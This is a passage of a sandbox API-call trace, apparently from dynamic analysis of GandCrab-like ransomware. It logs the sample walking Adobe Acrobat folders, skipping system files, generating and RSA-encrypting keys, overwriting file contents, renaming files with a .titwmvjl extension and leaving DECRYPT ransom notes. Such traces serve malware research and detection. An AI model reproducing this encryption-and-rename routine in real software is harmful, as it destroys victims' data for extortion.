"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.titwmvjl"), dwFlags=0x1) returned 1 [0069.463] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.464] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0069.464] lstrcmpW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".") returned 1 [0069.464] lstrcmpW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="..") returned 1 [0069.464] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" [0069.464] lstrlenW (lpString=".titwmvjl") returned 9 [0069.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0069.464] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.464] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.titwmvjl") returned 126 [0069.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0069.464] lstrlenW (lpString=".crl") returned 4 [0069.464] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.464] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".crl ") returned 5 [0069.464] lstrcmpiW (lpString1=".crl", lpString2=".titwmvjl") returned -1 [0069.464] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0069.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="desktop.ini") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="autorun.inf") returned 1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntuser.dat") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="iconcache.db") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="bootsect.bak") returned 1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="boot.ini") returned 1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntuser.dat.log") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="thumbs.db") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="KRAB-DECRYPT.html") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="CRAB-DECRYPT.html") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntldr") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="NTDETECT.COM") returned -1 [0069.465] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="Bootfont.bin") returned 1 [0069.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0069.465] lstrlenW (lpString=".crl") returned 4 [0069.465] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.465] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".crl ") returned 5 [0069.465] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.465] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.466] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0069.466] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0069.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.466] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0069.467] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.467] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.467] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.467] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0069.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.467] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.467] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.468] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0069.468] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.468] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.468] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.468] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0069.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.468] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.468] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.469] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0069.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.469] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503938) returned 1 [0069.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.470] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0069.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.470] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0069.470] GetLastError () returned 0x0 [0069.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.470] CryptDestroyKey (hKey=0x503938) returned 1 [0069.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.470] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.471] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0069.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.471] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503538) returned 1 [0069.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.472] CryptGetKeyParam (in: hKey=0x503538, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0069.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.472] CryptEncrypt (in: hKey=0x503538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0069.473] GetLastError () returned 0x0 [0069.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.473] CryptDestroyKey (hKey=0x503538) returned 1 [0069.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.473] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.473] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.473] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.474] ReadFile (in: hFile=0x2dc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e4f8*=0x1a9, lpOverlapped=0x0) returned 1 [0069.480] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffe57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.480] WriteFile (in: hFile=0x2dc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1a9, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e4dc*=0x1a9, lpOverlapped=0x0) returned 1 [0069.481] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.481] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.483] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.488] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.488] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.488] CloseHandle (hObject=0x2dc) returned 1 [0069.490] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.titwmvjl"), dwFlags=0x1) returned 1 [0069.491] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.492] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0069.492] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.492] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.492] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock" [0069.492] lstrlenW (lpString=".titwmvjl") returned 9 [0069.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock") returned 97 [0069.492] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.492] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 106 [0069.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a09d2ca4deb61a.lock") returned 97 [0069.492] lstrlenW (lpString=".lock") returned 5 [0069.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.492] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.492] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.492] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.492] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0069.492] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.492] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt" [0069.493] lstrlenW (lpString=".titwmvjl") returned 9 [0069.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt") returned 93 [0069.493] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.493] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 102 [0069.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt") returned 93 [0069.493] lstrlenW (lpString=".txt") returned 4 [0069.493] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.493] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.493] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.493] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt") returned 93 [0069.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\TITWMVJL-DECRYPT.txt") returned 93 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.493] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.494] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0069.494] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0069.494] CloseHandle (hObject=0x2d4) returned 1 [0069.494] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.494] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.494] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock" [0069.494] lstrlenW (lpString=".titwmvjl") returned 9 [0069.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock") returned 88 [0069.495] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.495] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 97 [0069.495] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock") returned 88 [0069.495] lstrlenW (lpString=".lock") returned 5 [0069.495] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.495] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.495] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.495] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.495] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.495] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.495] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.495] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt" [0069.495] lstrlenW (lpString=".titwmvjl") returned 9 [0069.495] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt") returned 84 [0069.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.496] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 93 [0069.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt") returned 84 [0069.496] lstrlenW (lpString=".txt") returned 4 [0069.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.496] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.496] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.496] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt") returned 84 [0069.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\TITWMVJL-DECRYPT.txt") returned 84 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.496] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.496] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.496] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0069.497] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0069.497] CloseHandle (hObject=0x2cc) returned 1 [0069.498] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.498] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.498] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.498] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt" [0069.498] lstrlenW (lpString=".titwmvjl") returned 9 [0069.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt") returned 75 [0069.498] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.498] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0069.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt") returned 75 [0069.498] lstrlenW (lpString=".txt") returned 4 [0069.498] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.498] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.498] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.498] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt") returned 75 [0069.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\TITWMVJL-DECRYPT.txt") returned 75 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 